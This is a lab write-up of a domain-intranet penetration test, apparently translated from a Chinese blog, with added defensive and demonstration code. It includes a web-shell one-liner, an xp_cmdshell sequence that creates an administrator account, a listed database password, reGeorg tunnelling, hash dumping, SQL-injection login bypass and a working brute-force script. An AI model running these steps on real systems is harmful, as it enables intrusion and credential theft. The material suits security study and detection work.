
Title: Environmental penetration testing process in the intranet penetration domain

0x00 Experimental purpose

Get the website source code of other hosts in the domain environment

0x01 Penetration idea

Obtain a web shell on the public website, pivot from that host into the intranet, use the intranet foothold to obtain domain control (domain admin) privileges, and then use those privileges to reach the other hosts in the domain and collect their resources.

0x02 Experimental process

Visiting the target website's IP shows a static site. Nothing on the front end can be used, so the next step is to brute-force the backend.

Scanning with the Yujian (御剑) directory scanner finds no backend login page, but it does find robots.txt, and robots.txt lists the backend directory.

Visit the backend login page.

Brute-force the login with Burp Intruder; the backend administrator's password is recovered.

Log in to the backend with the brute-forced administrator credentials (note: choose the full-function login option when logging in).
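The brute force above works because, as the summary notes, the backend's captcha stays valid for a long time, so one captured captcha and session cookie can be replayed on every attempt. The script below is an added example, not code from the original post: it starts a constructed in-process mock of such a login page (no real target is contacted) and runs a small user/password list through it while reusing a single captcha. The form field names user/pass/captcha, the cookie name ASPSESSIONID and the success marker "Welcome" are assumptions about the login form; adjust them to the real page.

```python
import threading
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# --- constructed mock of a backend login whose captcha never expires --------
# One captcha value is bound to a session cookie when the login page is first
# loaded and is then accepted again and again; that is the weakness abused.
MOCK_CREDENTIALS = {"admin": "passw0rd"}        # constructed
MOCK_CAPTCHA_BY_SESSION = {"s1a2b3": "7K3P"}    # constructed


class MockAdminLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        cookie = SimpleCookie(self.headers.get("Cookie", ""))
        session = cookie["ASPSESSIONID"].value if "ASPSESSIONID" in cookie else ""
        field = lambda name: form.get(name, [""])[0]
        captcha_ok = MOCK_CAPTCHA_BY_SESSION.get(session) == field("captcha")
        creds_ok = MOCK_CREDENTIALS.get(field("user")) == field("pass")
        body = b"Welcome to the admin panel" if captcha_ok and creds_ok else b"Login failed"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the mock quiet
        pass


def start_mock_server():
    """Bind the mock to a free loopback port; returns (server, login_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockAdminLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/admin/login.asp"


# --- the attack: replay one captured session + captcha for every guess ------
def brute_force_login(url, session_id, captcha, users, passwords, success_marker=b"Welcome"):
    """Return (user, password) for the first response containing success_marker, else None."""
    # Ignore environment proxies so the request goes straight to the target.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    for user in users:
        for password in passwords:
            data = urllib.parse.urlencode(
                {"user": user, "pass": password, "captcha": captcha}).encode()
            req = urllib.request.Request(
                url, data=data, headers={"Cookie": f"ASPSESSIONID={session_id}"})
            with opener.open(req, timeout=5) as resp:
                if success_marker in resp.read():
                    return user, password
    return None


if __name__ == "__main__":
    server, login_url = start_mock_server()
    print(brute_force_login(login_url, "s1a2b3", "7K3P",
                            ["admin"], ["123456", "admin888", "passw0rd"]))
    server.shutdown()
```

The same replay is what Burp Intruder does when the captcha field is left as a fixed value; the fix on the server side is to invalidate the captcha after one use and to lock or throttle the account after a few failures.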

Under interface style > template selection, the template folder name can be edited. Rename the template folder to 1.asp to exploit the IIS 6.0 parsing vulnerability: IIS 6.0 runs every file below a directory whose name ends in .asp through the ASP engine, whatever the file's own extension.

Then, under interface style > edit template/css file, add a new template (an .html file) whose content is the one-line web shell (一句话木马).

Connect to the one-liner with China Chopper (中国菜刀).

Through the one-liner, upload a full-featured ASPX web shell (a "big horse", 大马) to make the rest of the work easier.
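The three steps above (renaming the template folder to 1.asp, dropping a one-line shell into an .html file under it, connecting with China Chopper) depend on an IIS 6.0 parsing quirk. The script below is an added example, not the author's tooling: it decides whether IIS 6.0 would hand a given request path to asp.dll (the *.asp directory quirk and the ";" filename truncation quirk), flags one-line web shells by signature, and shows the allow-list check the template-folder rename should have had. The sample web root is constructed inline; the PHP and ASPX signatures go beyond the page's ASP one-liner.

```python
import re
from pathlib import PurePosixPath

# Extensions that IIS 6.0 maps to asp.dll; all of them execute as ASP.
ASP_EXTENSIONS = {".asp", ".asa", ".cer", ".cdx"}


def iis6_executes_as_asp(request_path: str) -> bool:
    """True if IIS 6.0 would execute this request as ASP.

    Quirk 1: any file below a directory named like "1.asp" is handed to
    asp.dll regardless of its own extension (/templates/1.asp/style.html).
    Quirk 2: the filename is cut at ';' before the handler is chosen, so
    /upload/shell.asp;.jpg also runs as ASP.
    """
    parts = PurePosixPath(request_path).parts
    if not parts:
        return False
    for directory in parts[:-1]:
        if PurePosixPath(directory).suffix.lower() in ASP_EXTENSIONS:
            return True
    effective_name = parts[-1].split(";", 1)[0]
    return PurePosixPath(effective_name).suffix.lower() in ASP_EXTENSIONS


# Signatures of common one-line web shells.
WEBSHELL_SIGNATURES = [
    ("asp eval/execute request()", re.compile(r"<%\s*(?:eval|execute)\s*\(?\s*request\s*\(", re.I)),
    ("aspx eval(Request.Item[])", re.compile(r"eval\s*\(\s*request\.item\s*\[", re.I)),
    ("php eval($_REQUEST[])", re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I)),
]


def webshell_signature(content: str):
    """Name of the first matching web-shell signature, or None."""
    for name, pattern in WEBSHELL_SIGNATURES:
        if pattern.search(content):
            return name
    return None


def scan_webroot(files: dict) -> list:
    """files maps request path -> content; returns sorted (path, reason) findings."""
    findings = []
    for path, content in files.items():
        signature = webshell_signature(content)
        if signature:
            findings.append((path, "webshell: " + signature))
        if iis6_executes_as_asp(path) and PurePosixPath(path).suffix.lower() not in ASP_EXTENSIONS:
            findings.append((path, "non-ASP file that IIS 6.0 would execute as ASP"))
    return sorted(findings)


# The check the template editor was missing: allow-list the folder name so it
# can carry neither an executable extension nor a ';'.
SAFE_FOLDER_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def is_safe_template_folder_name(name: str) -> bool:
    return SAFE_FOLDER_NAME.fullmatch(name) is not None


# Constructed sample web root mirroring the post: a renamed template folder
# and an .html "template" holding the ASP one-liner.
SAMPLE_WEBROOT = {
    "/templates/default/index.html": "<html><body>static page</body></html>",
    "/templates/1.asp/1.html": '<%eval request("pass")%>',
    "/upload/avatar.jpg": "\xff\xd8\xff...",
    "/upload/shell.asp;.jpg": '<%execute(request("cmd"))%>',
    "/admin/login.asp": '<% If Request("user") = "" Then Response.Redirect "index.asp" %>',
}

if __name__ == "__main__":
    for finding in scan_webroot(SAMPLE_WEBROOT):
        print(*finding)
```

Run against a real export of the web root, the scanner reports both the planted 1.asp directory and any stray shell.asp;.jpg uploads; the same two checks belong in the upload and rename handlers of the CMS itself.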

Checking the network configuration shows the host has two NICs, which gives two intranet segments.

The host's ARP cache shows several more intranet IPs.

A port scan shows 192.168.152.173 listening on port 1433, so it is probably the database server.

The website's configuration file contains the database account and password.

Using the ASPX shell's database function, log in to the database with those credentials; commands run through xp_cmdshell execute as SYSTEM.

List all user names in the domain.

List the domain group names.

List the computers in the current domain.

Query the domain administrators.

Through the database shell (xp_cmdshell), add a local account and put it in the Administrators group.
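The database steps above (xp_cmdshell running as SYSTEM, domain enumeration, a new local administrator) leave a distinctive trail in SQL Server's own logging. The script below is an added detection example, not part of the original post: it runs a few rules over constructed audit lines in the shape of a SQL Server Audit or Extended Events batch export (one completed batch per line) and reports the logins for which the whole chain, enable xp_cmdshell, execute commands, create an account, is present. The line layout and the login/host fields are assumptions; adapt the parsing to your real audit format.

```python
import re
from dataclasses import dataclass

# Constructed audit export in the style of a SQL Server batch log, one
# completed batch per line.  The statements mirror the commands in the post.
SAMPLE_AUDIT = """\
2022-01-24 16:34:05 login=webapp host=WEB-SERVER text=SELECT id, title FROM news WHERE id = 12
2022-01-24 16:34:06 login=sa host=WEB-SERVER text=EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
2022-01-24 16:34:06 login=sa host=WEB-SERVER text=EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
2022-01-24 16:34:07 login=sa host=WEB-SERVER text=EXEC master.dbo.xp_cmdshell 'whoami'
2022-01-24 16:34:08 login=sa host=WEB-SERVER text=EXEC master.dbo.xp_cmdshell 'dsquery user'
2022-01-24 16:34:08 login=sa host=WEB-SERVER text=EXEC master.dbo.xp_cmdshell 'net group "domain admins" /domain'
2022-01-24 16:34:09 login=sa host=WEB-SERVER text=EXEC master.dbo.xp_cmdshell 'net user ddd password#111 /add'
2022-01-24 16:34:09 login=sa host=WEB-SERVER text=EXEC master.dbo.xp_cmdshell 'net localgroup administrators ddd /add'
2022-01-24 16:34:10 login=webapp host=WEB-SERVER text=SELECT id, title FROM news WHERE id = 13
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) login=(?P<login>\S+) host=(?P<host>\S+) text=(?P<text>.*)$")

# Each rule names one step of the chain seen in the post.
RULES = [
    ("xp_cmdshell_enabled", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell_exec", re.compile(r"\bEXEC(?:UTE)?\s+(?:master\.(?:dbo\.)?)?xp_cmdshell\b", re.I)),
    ("domain_recon", re.compile(r"\bnet\s+(?:user|group)\b.*?/domain|\bnet\s+view\b|\bdsquery\s+user\b", re.I)),
    ("local_account_added", re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added_to_administrators", re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]


@dataclass
class Finding:
    line_no: int
    login: str
    rule: str
    text: str


def scan_audit(audit_text: str) -> list:
    """Apply every rule to every parsable line; one line can yield several findings."""
    findings = []
    for line_no, line in enumerate(audit_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        for rule, pattern in RULES:
            if pattern.search(m["text"]):
                findings.append(Finding(line_no, m["login"], rule, m["text"]))
    return findings


def xp_cmdshell_abuse_chain(findings: list) -> dict:
    """Logins that enabled xp_cmdshell, ran commands through it, and created an account."""
    rules_by_login = {}
    for f in findings:
        rules_by_login.setdefault(f.login, set()).add(f.rule)
    needed = {"xp_cmdshell_enabled", "xp_cmdshell_exec", "local_account_added"}
    return {login: sorted(rules) for login, rules in rules_by_login.items() if needed <= rules}


if __name__ == "__main__":
    hits = scan_audit(SAMPLE_AUDIT)
    for f in hits:
        print(f.line_no, f.login, f.rule, f.text)
    print(xp_cmdshell_abuse_chain(hits))
```

Two points the sample makes visible: the enabling call (sp_configure 'xp_cmdshell', 1) is itself a high-value alert on a server where the feature is supposed to be off, and a login of sa arriving from the web server host rather than an administrator workstation is worth its own rule once the host field is reliable.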

192.168.152.173 also has port 3389 (remote desktop) open.

Set up a proxy with reGeorg and Proxifier to reach it over remote desktop.

Log in to the remote desktop with the administrator account added above; in the connection options, share (mount) the local tools folder to the target machine.

The remote desktop login succeeds.

Upload QuarksPwDump.exe over the shared folder, then run it to dump the local administrator's password hash to a text file.

Looking the hash up as MD5 fails. The dumped value is an NT hash (MD4 over the UTF-16LE encoding of the password), not MD5, so an MD5 table cannot crack it.

Hosts in a domain usually follow a naming convention. On the compromised web server the web root is named game.fbi.gov.us; manual testing turns up another site, oa.fbi.gov.us.

Visiting oa.fbi.gov.us shows a source code repository log management system.

Try the ASP "universal password" (a SQL injection login bypass): account liufeng' or '1'='1 with any password logs in to the backend.

Adding a log entry reveals a stored XSS.

Clicking the log we added and checking its properties gives the URL of the added log.

Testing that URL for injection returns a 500 error, which suggests the parameter is injectable.

Point the Ah D injection tool (阿D注入工具) at the backend URL.

Injecting the URL retrieves the administrator password. For some reason the username did not come out, but that is not a big problem: several usernames were obtained above, there are not many, so they can be tried one by one.
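The universal-password bypass and the injection in the log URL above are the same bug: user input pasted into SQL text. The script below is an added example, not code from the post or from the OA system, using an in-memory SQLite database with constructed rows as a stand-in for the real backend. It shows the concatenated queries that let liufeng' or '1'='1 log in and let a crafted id pull the administrator's password, beside parameterised versions that do not.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the OA system's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('liufeng', 'S3cret!');
        CREATE TABLE logs(id INTEGER, title TEXT);
        INSERT INTO logs VALUES (394, 'deploy notes');
    """)
    return db


# --- vulnerable: input is concatenated into the SQL text -------------------
def login_vulnerable(db, username: str, password: str):
    # AND binds tighter than OR, so "liufeng' or '1'='1" becomes
    # username='liufeng' OR ('1'='1' AND password='...'); the real
    # username alone satisfies it.
    sql = f"SELECT username FROM admin WHERE username='{username}' AND password='{password}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def log_titles_vulnerable(db, log_id: str) -> list:
    sql = f"SELECT title FROM logs WHERE id={log_id}"
    return [r[0] for r in db.execute(sql).fetchall()]


# --- hardened: the same queries with bound parameters ----------------------
def login_safe(db, username: str, password: str):
    row = db.execute("SELECT username FROM admin WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def log_titles_safe(db, log_id: str) -> list:
    if not log_id.isdigit():                 # validate before it reaches SQL
        raise ValueError("log id must be numeric")
    return [r[0] for r in db.execute("SELECT title FROM logs WHERE id=?",
                                     (int(log_id),)).fetchall()]


def error_based_probe(db, log_id: str) -> bool:
    """True if a stray quote makes the query fail (the 500 seen in the post)."""
    try:
        log_titles_vulnerable(db, log_id)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "liufeng' or '1'='1", "anything"))
    print(login_safe(db, "liufeng' or '1'='1", "anything"))
    print(error_based_probe(db, "394'"))
    print(log_titles_vulnerable(db, "394 UNION ALL SELECT password FROM admin"))
```

The bypass needs an existing username in front of the injected OR, which is why the post's payload carries liufeng rather than an arbitrary name; the UNION payload is the manual form of what Ah D or sqlmap automates against the id parameter.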

Try the username and password obtained above to log in to other hosts in the domain.

The login succeeds, and files on the other PCs in the domain can be viewed and downloaded.

0x03 Summary

1. The target website IP serves a static site and nothing on the front end is usable. Scanning its directories with the Yujian directory scanner finds robots.txt, which exposes the backend page. The backend login has a captcha, but the captcha stays valid for a long time, so the login can be brute-forced with Burp; the credentials come out as admin/passw0rd at http://39.106.226.95:9235/admin

2. An nmap scan of the target IP shows Windows with IIS 6.0 and port 80 open.

3. Under interface style > template selection the template folder name can be edited; rename it to 1.asp.

4. Under interface style > edit template/css file, add a template named 1.html whose content is the one-line ASP shell:
   <%eval request("pass")%>

5. Connect to the one-liner with China Chopper, then use it to upload a full-featured ASPX shell.

6. Through the ASPX shell's command execution, check the NIC addresses: there are two NICs, 192.168.152.182 and 192.168.79.128.
   cmdpath: c:\windows\system32\cmd.exe   argument: /c ipconfig

7. Check the host's ARP cache and find several intranet IPs (192.168.152.182, 192.168.152.173, 192.168.152.180).
   cmdpath: c:\windows\system32\cmd.exe   argument: /c arp -a

8. With the ASPX shell's port-scan function, find ports 1433 and 3389 open.

9. Read the website configuration file and find the database account and password.

10. With the ASPX shell's database function, log in to the database; xp_cmdshell runs as SYSTEM.
    connstring: server=192.168.152.173;UID=sa;PWD=piy88PRO*JNJ24e3;database=master;provider=SQLOLEDB
    SQLEXEC: XP_cmdshell_exec   run sql: EXEC master.dbo.xp_cmdshell 'whoami'

11. List all user names in the domain:
    EXEC master.dbo.xp_cmdshell 'dsquery user'

12. List the domain group names:
    EXEC master.dbo.xp_cmdshell 'net group /domain'

13. List the computers in the current domain; host names such as web-server, file-server and db-server appear:
    EXEC master.dbo.xp_cmdshell 'net view'

14. Query the domain administrators:
    EXEC master.dbo.xp_cmdshell 'net group "domain admins" /domain'

15. Through the database shell, add an account and put it in the Administrators group:
    EXEC master.dbo.xp_cmdshell 'net user ddd password#111 /add'
    EXEC master.dbo.xp_cmdshell 'net localgroup administrators ddd /add'

16. Upload reGeorg's tunnel.aspx to the target (39.106.226.95) through the ASPX shell and confirm it answers at http://39.106.226.95:9235/tunnel.aspx

17. Open the tunnel between the local machine and the target with reGeorg:
    python reGeorgSocksProxy.py -p 8888 -l 0.0.0.0 -u http://39.106.226.95:9235/tunnel.aspx

18. In Proxifier add a SOCKS4 proxy at 127.0.0.1:8888.

19. Launch mstsc through Proxifier and connect to 192.168.152.173 over remote desktop; in the connection options, share the local tools folder with the target.

20. Upload QuarksPwDump.exe over the shared folder and use it to dump the local administrator's password hash to a txt file; the hash cannot be cracked with an MD5 lookup (it is an NT hash, not MD5).

21. The web root contains another directory, oa.fbi.gov.us; accessing it as a domain name shows a source code repository log management system.

22. Try the ASP universal password to bypass the login: account admin' or '1'='1 with any password logs in to the backend.

23. There is a stored XSS.

24. Click the added log and check its properties to find the URL http://oa.fbi.gov.us/logive.asp?id=394

25. Use the Ah D injection tool or sqlmap to inject the username and password.

26. Log in to other hosts over remote desktop with the injected username and password.

Original link: https://blog.csdn.net/weixin_44991517/article/details/93896401
